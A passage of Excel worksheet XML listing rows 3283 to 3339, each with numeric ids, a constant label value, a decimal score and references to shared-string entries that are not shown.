      <c r="C3283">
        <v>5921</v>
      </c>
      <c r="D3283">
        <v>2</v>
      </c>
      <c r="E3283">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3283" t="s">
        <v>5592</v>
      </c>
      <c r="G3283" t="s">
        <v>6492</v>
      </c>
      <c r="H3283" t="s">
        <v>6493</v>
      </c>
    </row>
    <row r="3284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3284" s="1">
        <v>3282</v>
      </c>
      <c r="B3284">
        <v>4672</v>
      </c>
      <c r="C3284">
        <v>4672</v>
      </c>
      <c r="D3284">
        <v>2</v>
      </c>
      <c r="E3284">
        <v>0.86659997701644897</v>
      </c>
      <c r="F3284" t="s">
        <v>5592</v>
      </c>
      <c r="G3284" t="s">
        <v>6494</v>
      </c>
      <c r="H3284" t="s">
        <v>6495</v>
      </c>
    </row>
    <row r="3285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3285" s="1">
        <v>3283</v>
      </c>
      <c r="B3285">
        <v>4980</v>
      </c>
      <c r="C3285">
        <v>4980</v>
      </c>
      <c r="D3285">
        <v>2</v>
      </c>
      <c r="E3285">
        <v>0.67400002479553223</v>
      </c>
      <c r="F3285" t="s">
        <v>5592</v>
      </c>
      <c r="G3285" t="s">
        <v>6496</v>
      </c>
      <c r="H3285" t="s">
        <v>6497</v>
      </c>
    </row>
    <row r="3286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3286" s="1">
        <v>3284</v>
      </c>
      <c r="B3286">
        <v>5928</v>
      </c>
      <c r="C3286">
        <v>5928</v>
      </c>
      <c r="D3286">
        <v>2</v>
      </c>
      <c r="E3286">
        <v>0.52579998970031738</v>
      </c>
      <c r="F3286" t="s">
        <v>5592</v>
      </c>
      <c r="G3286" t="s">
        <v>6498</v>
      </c>
      <c r="H3286" t="s">
        <v>6499</v>
      </c>
    </row>
    <row r="3287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3287" s="1">
        <v>3285</v>
      </c>
      <c r="B3287">
        <v>4669</v>
      </c>
      <c r="C3287">
        <v>4669</v>
      </c>
      <c r="D3287">
        <v>2</v>
      </c>
      <c r="E3287">
        <v>0.57209998369216919</v>
      </c>
      <c r="F3287" t="s">
        <v>5592</v>
      </c>
      <c r="G3287" t="s">
        <v>6500</v>
      </c>
      <c r="H3287" t="s">
        <v>6501</v>
      </c>
    </row>
    <row r="3288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3288" s="1">
        <v>3286</v>
      </c>
      <c r="B3288">
        <v>4656</v>
      </c>
      <c r="C3288">
        <v>4656</v>
      </c>
      <c r="D3288">
        <v>2</v>
      </c>
      <c r="E3288">
        <v>0.97369998693466187</v>
      </c>
      <c r="F3288" t="s">
        <v>5592</v>
      </c>
      <c r="G3288" t="s">
        <v>6502</v>
      </c>
      <c r="H3288" t="s">
        <v>6503</v>
      </c>
    </row>
    <row r="3289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3289" s="1">
        <v>3287</v>
      </c>
      <c r="B3289">
        <v>4658</v>
      </c>
      <c r="C3289">
        <v>4658</v>
      </c>
      <c r="D3289">
        <v>2</v>
      </c>
      <c r="E3289">
        <v>0.72539997100830078</v>
      </c>
      <c r="F3289" t="s">
        <v>5592</v>
      </c>
      <c r="G3289" t="s">
        <v>6504</v>
      </c>
      <c r="H3289" t="s">
        <v>6505</v>
      </c>
    </row>
    <row r="3290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3290" s="1">
        <v>3288</v>
      </c>
      <c r="B3290">
        <v>4659</v>
      </c>
      <c r="C3290">
        <v>4659</v>
      </c>
      <c r="D3290">
        <v>2</v>
      </c>
      <c r="E3290">
        <v>0.99779999256134033</v>
      </c>
      <c r="F3290" t="s">
        <v>5592</v>
      </c>
      <c r="G3290" t="s">
        <v>6506</v>
      </c>
      <c r="H3290" t="s">
        <v>6507</v>
      </c>
    </row>
    <row r="3291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3291" s="1">
        <v>3289</v>
      </c>
      <c r="B3291">
        <v>5806</v>
      </c>
      <c r="C3291">
        <v>5806</v>
      </c>
      <c r="D3291">
        <v>2</v>
      </c>
      <c r="E3291">
        <v>0.65570002794265747</v>
      </c>
      <c r="F3291" t="s">
        <v>5592</v>
      </c>
      <c r="G3291" t="s">
        <v>6508</v>
      </c>
      <c r="H3291" t="s">
        <v>6509</v>
      </c>
    </row>
    <row r="3292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3292" s="1">
        <v>3290</v>
      </c>
      <c r="B3292">
        <v>5001</v>
      </c>
      <c r="C3292">
        <v>5001</v>
      </c>
      <c r="D3292">
        <v>2</v>
      </c>
      <c r="E3292">
        <v>0.99419999122619629</v>
      </c>
      <c r="F3292" t="s">
        <v>5592</v>
      </c>
      <c r="G3292" t="s">
        <v>6510</v>
      </c>
      <c r="H3292" t="s">
        <v>6511</v>
      </c>
    </row>
    <row r="3293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3293" s="1">
        <v>3291</v>
      </c>
      <c r="B3293">
        <v>5000</v>
      </c>
      <c r="C3293">
        <v>5000</v>
      </c>
      <c r="D3293">
        <v>2</v>
      </c>
      <c r="E3293">
        <v>0.83490002155303955</v>
      </c>
      <c r="F3293" t="s">
        <v>5592</v>
      </c>
      <c r="G3293" t="s">
        <v>6512</v>
      </c>
      <c r="H3293" t="s">
        <v>6513</v>
      </c>
    </row>
    <row r="3294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3294" s="1">
        <v>3292</v>
      </c>
      <c r="B3294">
        <v>4661</v>
      </c>
      <c r="C3294">
        <v>4661</v>
      </c>
      <c r="D3294">
        <v>2</v>
      </c>
      <c r="E3294">
        <v>0.84609997272491455</v>
      </c>
      <c r="F3294" t="s">
        <v>5592</v>
      </c>
      <c r="G3294" t="s">
        <v>6514</v>
      </c>
      <c r="H3294" t="s">
        <v>6515</v>
      </c>
    </row>
    <row r="3295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3295" s="1">
        <v>3293</v>
      </c>
      <c r="B3295">
        <v>5918</v>
      </c>
      <c r="C3295">
        <v>5918</v>
      </c>
      <c r="D3295">
        <v>2</v>
      </c>
      <c r="E3295">
        <v>0.50230002403259277</v>
      </c>
      <c r="F3295" t="s">
        <v>5592</v>
      </c>
      <c r="G3295" t="s">
        <v>6516</v>
      </c>
      <c r="H3295" t="s">
        <v>6517</v>
      </c>
    </row>
    <row r="3296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3296" s="1">
        <v>3294</v>
      </c>
      <c r="B3296">
        <v>4662</v>
      </c>
      <c r="C3296">
        <v>4662</v>
      </c>
      <c r="D3296">
        <v>2</v>
      </c>
      <c r="E3296">
        <v>0.51840001344680786</v>
      </c>
      <c r="F3296" t="s">
        <v>5592</v>
      </c>
      <c r="G3296" t="s">
        <v>6518</v>
      </c>
      <c r="H3296" t="s">
        <v>6519</v>
      </c>
    </row>
    <row r="3297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3297" s="1">
        <v>3295</v>
      </c>
      <c r="B3297">
        <v>4990</v>
      </c>
      <c r="C3297">
        <v>4990</v>
      </c>
      <c r="D3297">
        <v>2</v>
      </c>
      <c r="E3297">
        <v>0.94690001010894775</v>
      </c>
      <c r="F3297" t="s">
        <v>5592</v>
      </c>
      <c r="G3297" t="s">
        <v>6520</v>
      </c>
      <c r="H3297" t="s">
        <v>6521</v>
      </c>
    </row>
    <row r="3298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3298" s="1">
        <v>3296</v>
      </c>
      <c r="B3298">
        <v>4988</v>
      </c>
      <c r="C3298">
        <v>4988</v>
      </c>
      <c r="D3298">
        <v>2</v>
      </c>
      <c r="E3298">
        <v>0.81999999284744263</v>
      </c>
      <c r="F3298" t="s">
        <v>5592</v>
      </c>
      <c r="G3298" t="s">
        <v>6522</v>
      </c>
      <c r="H3298" t="s">
        <v>6523</v>
      </c>
    </row>
    <row r="3299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3299" s="1">
        <v>3297</v>
      </c>
      <c r="B3299">
        <v>4664</v>
      </c>
      <c r="C3299">
        <v>4664</v>
      </c>
      <c r="D3299">
        <v>2</v>
      </c>
      <c r="E3299">
        <v>0.80909997224807739</v>
      </c>
      <c r="F3299" t="s">
        <v>5592</v>
      </c>
      <c r="G3299" t="s">
        <v>6524</v>
      </c>
      <c r="H3299" t="s">
        <v>6525</v>
      </c>
    </row>
    <row r="3300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3300" s="1">
        <v>3298</v>
      </c>
      <c r="B3300">
        <v>4985</v>
      </c>
      <c r="C3300">
        <v>4985</v>
      </c>
      <c r="D3300">
        <v>2</v>
      </c>
      <c r="E3300">
        <v>0.98919999599456787</v>
      </c>
      <c r="F3300" t="s">
        <v>5592</v>
      </c>
      <c r="G3300" t="s">
        <v>6526</v>
      </c>
      <c r="H3300" t="s">
        <v>6527</v>
      </c>
    </row>
    <row r="3301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3301" s="1">
        <v>3299</v>
      </c>
      <c r="B3301">
        <v>4665</v>
      </c>
      <c r="C3301">
        <v>4665</v>
      </c>
      <c r="D3301">
        <v>2</v>
      </c>
      <c r="E3301">
        <v>0.65479999780654907</v>
      </c>
      <c r="F3301" t="s">
        <v>5592</v>
      </c>
      <c r="G3301" t="s">
        <v>6528</v>
      </c>
      <c r="H3301" t="s">
        <v>6529</v>
      </c>
    </row>
    <row r="3302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3302" s="1">
        <v>3300</v>
      </c>
      <c r="B3302">
        <v>4666</v>
      </c>
      <c r="C3302">
        <v>4666</v>
      </c>
      <c r="D3302">
        <v>2</v>
      </c>
      <c r="E3302">
        <v>0.47420001029968262</v>
      </c>
      <c r="F3302" t="s">
        <v>5592</v>
      </c>
      <c r="G3302" t="s">
        <v>6530</v>
      </c>
      <c r="H3302" t="s">
        <v>6531</v>
      </c>
    </row>
    <row r="3303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3303" s="1">
        <v>3301</v>
      </c>
      <c r="B3303">
        <v>4667</v>
      </c>
      <c r="C3303">
        <v>4667</v>
      </c>
      <c r="D3303">
        <v>2</v>
      </c>
      <c r="E3303">
        <v>0.72600001096725464</v>
      </c>
      <c r="F3303" t="s">
        <v>5592</v>
      </c>
      <c r="G3303" t="s">
        <v>6532</v>
      </c>
      <c r="H3303" t="s">
        <v>6533</v>
      </c>
    </row>
    <row r="3304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3304" s="1">
        <v>3302</v>
      </c>
      <c r="B3304">
        <v>5929</v>
      </c>
      <c r="C3304">
        <v>5929</v>
      </c>
      <c r="D3304">
        <v>2</v>
      </c>
      <c r="E3304">
        <v>0.98979997634887695</v>
      </c>
      <c r="F3304" t="s">
        <v>5592</v>
      </c>
      <c r="G3304" t="s">
        <v>6534</v>
      </c>
      <c r="H3304" t="s">
        <v>6535</v>
      </c>
    </row>
    <row r="3305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3305" s="1">
        <v>3303</v>
      </c>
      <c r="B3305">
        <v>4970</v>
      </c>
      <c r="C3305">
        <v>4970</v>
      </c>
      <c r="D3305">
        <v>2</v>
      </c>
      <c r="E3305">
        <v>0.90630000829696655</v>
      </c>
      <c r="F3305" t="s">
        <v>5592</v>
      </c>
      <c r="G3305" t="s">
        <v>6536</v>
      </c>
      <c r="H3305" t="s">
        <v>6537</v>
      </c>
    </row>
    <row r="3306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3306" s="1">
        <v>3304</v>
      </c>
      <c r="B3306">
        <v>5817</v>
      </c>
      <c r="C3306">
        <v>5817</v>
      </c>
      <c r="D3306">
        <v>2</v>
      </c>
      <c r="E3306">
        <v>0.73119997978210449</v>
      </c>
      <c r="F3306" t="s">
        <v>5592</v>
      </c>
      <c r="G3306" t="s">
        <v>6538</v>
      </c>
      <c r="H3306" t="s">
        <v>6539</v>
      </c>
    </row>
    <row r="3307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3307" s="1">
        <v>3305</v>
      </c>
      <c r="B3307">
        <v>5915</v>
      </c>
      <c r="C3307">
        <v>5915</v>
      </c>
      <c r="D3307">
        <v>2</v>
      </c>
      <c r="E3307">
        <v>0.95300000905990601</v>
      </c>
      <c r="F3307" t="s">
        <v>5592</v>
      </c>
      <c r="G3307" t="s">
        <v>6540</v>
      </c>
      <c r="H3307" t="s">
        <v>6541</v>
      </c>
    </row>
    <row r="3308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3308" s="1">
        <v>3306</v>
      </c>
      <c r="B3308">
        <v>4940</v>
      </c>
      <c r="C3308">
        <v>4940</v>
      </c>
      <c r="D3308">
        <v>2</v>
      </c>
      <c r="E3308">
        <v>0.93440002202987671</v>
      </c>
      <c r="F3308" t="s">
        <v>5592</v>
      </c>
      <c r="G3308" t="s">
        <v>6542</v>
      </c>
      <c r="H3308" t="s">
        <v>6543</v>
      </c>
    </row>
    <row r="3309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3309" s="1">
        <v>3307</v>
      </c>
      <c r="B3309">
        <v>5906</v>
      </c>
      <c r="C3309">
        <v>5906</v>
      </c>
      <c r="D3309">
        <v>2</v>
      </c>
      <c r="E3309">
        <v>0.99900001287460327</v>
      </c>
      <c r="F3309" t="s">
        <v>5592</v>
      </c>
      <c r="G3309" t="s">
        <v>6544</v>
      </c>
      <c r="H3309" t="s">
        <v>6545</v>
      </c>
    </row>
    <row r="3310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3310" s="1">
        <v>3308</v>
      </c>
      <c r="B3310">
        <v>5830</v>
      </c>
      <c r="C3310">
        <v>5830</v>
      </c>
      <c r="D3310">
        <v>2</v>
      </c>
      <c r="E3310">
        <v>0.46700000762939448</v>
      </c>
      <c r="F3310" t="s">
        <v>5592</v>
      </c>
      <c r="G3310" t="s">
        <v>6546</v>
      </c>
      <c r="H3310" t="s">
        <v>6547</v>
      </c>
    </row>
    <row r="3311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3311" s="1">
        <v>3309</v>
      </c>
      <c r="B3311">
        <v>5831</v>
      </c>
      <c r="C3311">
        <v>5831</v>
      </c>
      <c r="D3311">
        <v>2</v>
      </c>
      <c r="E3311">
        <v>0.70569998025894165</v>
      </c>
      <c r="F3311" t="s">
        <v>5592</v>
      </c>
      <c r="G3311" t="s">
        <v>6548</v>
      </c>
      <c r="H3311" t="s">
        <v>6549</v>
      </c>
    </row>
    <row r="3312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3312" s="1">
        <v>3310</v>
      </c>
      <c r="B3312">
        <v>4933</v>
      </c>
      <c r="C3312">
        <v>4933</v>
      </c>
      <c r="D3312">
        <v>2</v>
      </c>
      <c r="E3312">
        <v>0.98430001735687256</v>
      </c>
      <c r="F3312" t="s">
        <v>5592</v>
      </c>
      <c r="G3312" t="s">
        <v>6550</v>
      </c>
      <c r="H3312" t="s">
        <v>6551</v>
      </c>
    </row>
    <row r="3313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3313" s="1">
        <v>3311</v>
      </c>
      <c r="B3313">
        <v>5834</v>
      </c>
      <c r="C3313">
        <v>5834</v>
      </c>
      <c r="D3313">
        <v>2</v>
      </c>
      <c r="E3313">
        <v>0.94059997797012329</v>
      </c>
      <c r="F3313" t="s">
        <v>5592</v>
      </c>
      <c r="G3313" t="s">
        <v>6552</v>
      </c>
      <c r="H3313" t="s">
        <v>6553</v>
      </c>
    </row>
    <row r="3314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3314" s="1">
        <v>3312</v>
      </c>
      <c r="B3314">
        <v>4755</v>
      </c>
      <c r="C3314">
        <v>4755</v>
      </c>
      <c r="D3314">
        <v>2</v>
      </c>
      <c r="E3314">
        <v>0.52350002527236938</v>
      </c>
      <c r="F3314" t="s">
        <v>5592</v>
      </c>
      <c r="G3314" t="s">
        <v>6554</v>
      </c>
      <c r="H3314" t="s">
        <v>6555</v>
      </c>
    </row>
    <row r="3315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3315" s="1">
        <v>3313</v>
      </c>
      <c r="B3315">
        <v>5828</v>
      </c>
      <c r="C3315">
        <v>5828</v>
      </c>
      <c r="D3315">
        <v>2</v>
      </c>
      <c r="E3315">
        <v>0.66769999265670776</v>
      </c>
      <c r="F3315" t="s">
        <v>5592</v>
      </c>
      <c r="G3315" t="s">
        <v>6556</v>
      </c>
      <c r="H3315" t="s">
        <v>6557</v>
      </c>
    </row>
    <row r="3316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3316" s="1">
        <v>3314</v>
      </c>
      <c r="B3316">
        <v>4756</v>
      </c>
      <c r="C3316">
        <v>4756</v>
      </c>
      <c r="D3316">
        <v>2</v>
      </c>
      <c r="E3316">
        <v>0.8848000168800354</v>
      </c>
      <c r="F3316" t="s">
        <v>5592</v>
      </c>
      <c r="G3316" t="s">
        <v>6558</v>
      </c>
      <c r="H3316" t="s">
        <v>6559</v>
      </c>
    </row>
    <row r="3317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3317" s="1">
        <v>3315</v>
      </c>
      <c r="B3317">
        <v>4926</v>
      </c>
      <c r="C3317">
        <v>4926</v>
      </c>
      <c r="D3317">
        <v>2</v>
      </c>
      <c r="E3317">
        <v>0.97949999570846558</v>
      </c>
      <c r="F3317" t="s">
        <v>5592</v>
      </c>
      <c r="G3317" t="s">
        <v>6560</v>
      </c>
      <c r="H3317" t="s">
        <v>6561</v>
      </c>
    </row>
    <row r="3318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3318" s="1">
        <v>3316</v>
      </c>
      <c r="B3318">
        <v>4758</v>
      </c>
      <c r="C3318">
        <v>4758</v>
      </c>
      <c r="D3318">
        <v>2</v>
      </c>
      <c r="E3318">
        <v>0.76999998092651367</v>
      </c>
      <c r="F3318" t="s">
        <v>5592</v>
      </c>
      <c r="G3318" t="s">
        <v>6562</v>
      </c>
      <c r="H3318" t="s">
        <v>6563</v>
      </c>
    </row>
    <row r="3319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3319" s="1">
        <v>3317</v>
      </c>
      <c r="B3319">
        <v>4759</v>
      </c>
      <c r="C3319">
        <v>4759</v>
      </c>
      <c r="D3319">
        <v>2</v>
      </c>
      <c r="E3319">
        <v>0.68330001831054688</v>
      </c>
      <c r="F3319" t="s">
        <v>5592</v>
      </c>
      <c r="G3319" t="s">
        <v>6564</v>
      </c>
      <c r="H3319" t="s">
        <v>6565</v>
      </c>
    </row>
    <row r="3320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3320" s="1">
        <v>3318</v>
      </c>
      <c r="B3320">
        <v>5837</v>
      </c>
      <c r="C3320">
        <v>5837</v>
      </c>
      <c r="D3320">
        <v>2</v>
      </c>
      <c r="E3320">
        <v>0.6898999810218811</v>
      </c>
      <c r="F3320" t="s">
        <v>5592</v>
      </c>
      <c r="G3320" t="s">
        <v>6566</v>
      </c>
      <c r="H3320" t="s">
        <v>6567</v>
      </c>
    </row>
    <row r="3321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3321" s="1">
        <v>3319</v>
      </c>
      <c r="B3321">
        <v>4761</v>
      </c>
      <c r="C3321">
        <v>4761</v>
      </c>
      <c r="D3321">
        <v>2</v>
      </c>
      <c r="E3321">
        <v>0.60170000791549683</v>
      </c>
      <c r="F3321" t="s">
        <v>5592</v>
      </c>
      <c r="G3321" t="s">
        <v>6568</v>
      </c>
      <c r="H3321" t="s">
        <v>6569</v>
      </c>
    </row>
    <row r="3322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3322" s="1">
        <v>3320</v>
      </c>
      <c r="B3322">
        <v>4924</v>
      </c>
      <c r="C3322">
        <v>4924</v>
      </c>
      <c r="D3322">
        <v>2</v>
      </c>
      <c r="E3322">
        <v>0.81089997291564941</v>
      </c>
      <c r="F3322" t="s">
        <v>5592</v>
      </c>
      <c r="G3322" t="s">
        <v>6570</v>
      </c>
      <c r="H3322" t="s">
        <v>6463</v>
      </c>
    </row>
    <row r="3323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3323" s="1">
        <v>3321</v>
      </c>
      <c r="B3323">
        <v>5904</v>
      </c>
      <c r="C3323">
        <v>5904</v>
      </c>
      <c r="D3323">
        <v>2</v>
      </c>
      <c r="E3323">
        <v>0.47020000219345093</v>
      </c>
      <c r="F3323" t="s">
        <v>5592</v>
      </c>
      <c r="G3323" t="s">
        <v>6571</v>
      </c>
      <c r="H3323" t="s">
        <v>6572</v>
      </c>
    </row>
    <row r="3324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3324" s="1">
        <v>3322</v>
      </c>
      <c r="B3324">
        <v>4927</v>
      </c>
      <c r="C3324">
        <v>4927</v>
      </c>
      <c r="D3324">
        <v>2</v>
      </c>
      <c r="E3324">
        <v>0.53359997272491455</v>
      </c>
      <c r="F3324" t="s">
        <v>5592</v>
      </c>
      <c r="G3324" t="s">
        <v>6573</v>
      </c>
      <c r="H3324" t="s">
        <v>6574</v>
      </c>
    </row>
    <row r="3325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3325" s="1">
        <v>3323</v>
      </c>
      <c r="B3325">
        <v>5903</v>
      </c>
      <c r="C3325">
        <v>5903</v>
      </c>
      <c r="D3325">
        <v>2</v>
      </c>
      <c r="E3325">
        <v>0.66079998016357422</v>
      </c>
      <c r="F3325" t="s">
        <v>5592</v>
      </c>
      <c r="G3325" t="s">
        <v>6575</v>
      </c>
      <c r="H3325" t="s">
        <v>6576</v>
      </c>
    </row>
    <row r="3326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3326" s="1">
        <v>3324</v>
      </c>
      <c r="B3326">
        <v>5907</v>
      </c>
      <c r="C3326">
        <v>5907</v>
      </c>
      <c r="D3326">
        <v>2</v>
      </c>
      <c r="E3326">
        <v>0.62989997863769531</v>
      </c>
      <c r="F3326" t="s">
        <v>5592</v>
      </c>
      <c r="G3326" t="s">
        <v>6577</v>
      </c>
      <c r="H3326" t="s">
        <v>6166</v>
      </c>
    </row>
    <row r="3327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3327" s="1">
        <v>3325</v>
      </c>
      <c r="B3327">
        <v>4944</v>
      </c>
      <c r="C3327">
        <v>4944</v>
      </c>
      <c r="D3327">
        <v>2</v>
      </c>
      <c r="E3327">
        <v>0.4650999903678894</v>
      </c>
      <c r="F3327" t="s">
        <v>5592</v>
      </c>
      <c r="G3327" t="s">
        <v>6578</v>
      </c>
      <c r="H3327" t="s">
        <v>6579</v>
      </c>
    </row>
    <row r="3328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3328" s="1">
        <v>3326</v>
      </c>
      <c r="B3328">
        <v>5914</v>
      </c>
      <c r="C3328">
        <v>5914</v>
      </c>
      <c r="D3328">
        <v>2</v>
      </c>
      <c r="E3328">
        <v>0.97860002517700195</v>
      </c>
      <c r="F3328" t="s">
        <v>5592</v>
      </c>
      <c r="G3328" t="s">
        <v>6580</v>
      </c>
      <c r="H3328" t="s">
        <v>6581</v>
      </c>
    </row>
    <row r="3329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3329" s="1">
        <v>3327</v>
      </c>
      <c r="B3329">
        <v>5913</v>
      </c>
      <c r="C3329">
        <v>5913</v>
      </c>
      <c r="D3329">
        <v>2</v>
      </c>
      <c r="E3329">
        <v>0.99599999189376831</v>
      </c>
      <c r="F3329" t="s">
        <v>5592</v>
      </c>
      <c r="G3329" t="s">
        <v>6582</v>
      </c>
      <c r="H3329" t="s">
        <v>6583</v>
      </c>
    </row>
    <row r="3330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3330" s="1">
        <v>3328</v>
      </c>
      <c r="B3330">
        <v>4965</v>
      </c>
      <c r="C3330">
        <v>4965</v>
      </c>
      <c r="D3330">
        <v>2</v>
      </c>
      <c r="E3330">
        <v>0.55239999294281006</v>
      </c>
      <c r="F3330" t="s">
        <v>5592</v>
      </c>
      <c r="G3330" t="s">
        <v>6584</v>
      </c>
      <c r="H3330" t="s">
        <v>6585</v>
      </c>
    </row>
    <row r="3331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3331" s="1">
        <v>3329</v>
      </c>
      <c r="B3331">
        <v>4964</v>
      </c>
      <c r="C3331">
        <v>4964</v>
      </c>
      <c r="D3331">
        <v>2</v>
      </c>
      <c r="E3331">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3331" t="s">
        <v>5592</v>
      </c>
      <c r="G3331" t="s">
        <v>6586</v>
      </c>
      <c r="H3331" t="s">
        <v>6587</v>
      </c>
    </row>
    <row r="3332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3332" s="1">
        <v>3330</v>
      </c>
      <c r="B3332">
        <v>4963</v>
      </c>
      <c r="C3332">
        <v>4963</v>
      </c>
      <c r="D3332">
        <v>2</v>
      </c>
      <c r="E3332">
        <v>0.99639999866485596</v>
      </c>
      <c r="F3332" t="s">
        <v>5592</v>
      </c>
      <c r="G3332" t="s">
        <v>6588</v>
      </c>
      <c r="H3332" t="s">
        <v>6589</v>
      </c>
    </row>
    <row r="3333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3333" s="1">
        <v>3331</v>
      </c>
      <c r="B3333">
        <v>4960</v>
      </c>
      <c r="C3333">
        <v>4960</v>
      </c>
      <c r="D3333">
        <v>2</v>
      </c>
      <c r="E3333">
        <v>0.79890000820159912</v>
      </c>
      <c r="F3333" t="s">
        <v>5592</v>
      </c>
      <c r="G3333" t="s">
        <v>6590</v>
      </c>
      <c r="H3333" t="s">
        <v>6591</v>
      </c>
    </row>
    <row r="3334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3334" s="1">
        <v>3332</v>
      </c>
      <c r="B3334">
        <v>4959</v>
      </c>
      <c r="C3334">
        <v>4959</v>
      </c>
      <c r="D3334">
        <v>2</v>
      </c>
      <c r="E3334">
        <v>0.99870002269744873</v>
      </c>
      <c r="F3334" t="s">
        <v>5592</v>
      </c>
      <c r="G3334" t="s">
        <v>6592</v>
      </c>
      <c r="H3334" t="s">
        <v>6593</v>
      </c>
    </row>
    <row r="3335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3335" s="1">
        <v>3333</v>
      </c>
      <c r="B3335">
        <v>4739</v>
      </c>
      <c r="C3335">
        <v>4739</v>
      </c>
      <c r="D3335">
        <v>2</v>
      </c>
      <c r="E3335">
        <v>0.79589998722076416</v>
      </c>
      <c r="F3335" t="s">
        <v>5592</v>
      </c>
      <c r="G3335" t="s">
        <v>6594</v>
      </c>
      <c r="H3335" t="s">
        <v>6595</v>
      </c>
    </row>
    <row r="3336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3336" s="1">
        <v>3334</v>
      </c>
      <c r="B3336">
        <v>4954</v>
      </c>
      <c r="C3336">
        <v>4954</v>
      </c>
      <c r="D3336">
        <v>2</v>
      </c>
      <c r="E3336">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3336" t="s">
        <v>5592</v>
      </c>
      <c r="G3336" t="s">
        <v>6596</v>
      </c>
      <c r="H3336" t="s">
        <v>6597</v>
      </c>
    </row>
    <row r="3337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3337" s="1">
        <v>3335</v>
      </c>
      <c r="B3337">
        <v>4952</v>
      </c>
      <c r="C3337">
        <v>4952</v>
      </c>
      <c r="D3337">
        <v>2</v>
      </c>
      <c r="E3337">
        <v>0.64819997549057007</v>
      </c>
      <c r="F3337" t="s">
        <v>5592</v>
      </c>
      <c r="G3337" t="s">
        <v>6598</v>
      </c>
      <c r="H3337" t="s">
        <v>6599</v>
      </c>
    </row>
    <row r="3338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3338" s="1">
        <v>3336</v>
      </c>
      <c r="B3338">
        <v>5912</v>
      </c>
      <c r="C3338">
        <v>5912</v>
      </c>
      <c r="D3338">
        <v>2</v>
      </c>
      <c r="E3338">
        <v>0.56349998712539673</v>
      </c>
      <c r="F3338" t="s">
        <v>5592</v>
      </c>
      <c r="G3338" t="s">
        <v>6600</v>
      </c>
      <c r="H3338" t="s">
        <v>6601</v>
      </c>
    </row>
    <row r="3339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3339" s="1">
        <v>3337</v>
      </c>
      <c r="B3339">
        <v>5822</v>
      </c>
      <c r="C3339">
        <v>5822</v>
      </c>
      <c r="D3339">
        <v>2</v>
      </c>
      <c r="E3339">
        <v>0.99199998378753662</v>
      </c>
      <c r="F3339" t="s">
        <v>5592</v>
      </c>
      <c r="G3339" t="s">
        <v>6602</v>
      </c>
      <c r="H3339" t="s">
        <v>6603</v>
      </c>
    </row>
    <row r="3340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3340" s="1">
        <v>3338</v>
      </c>
      <c r="B3340">
        <v>4950</v>
      </c>
      <c r="C3340">
        <v>4950</v>
      </c>
      <c r="D3340">
        <v>2</v>
      </c>
      <c r="E3340">
        <v>0.74589997529983521</v>
      </c>
      <c r="F3340" t="s">
        <v>5592</v>
      </c>
      <c r="G3340" t="s">
        <v>6604</v>
      </c>
      <c r="H3340" t="s">
        <v>6605</v>
      </c>
    </row>
    <row r="3341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3341" s="1">
        <v>3339</v>
      </c>
      <c r="B3341">
        <v>5911</v>
      </c>
      <c r="C3341">
        <v>5911</v>
      </c>
      <c r="D3341">
        <v>2</v>
      </c>
      <c r="E3341">
        <v>0.9934999942779541</v>
      </c>
      <c r="F3341" t="s">
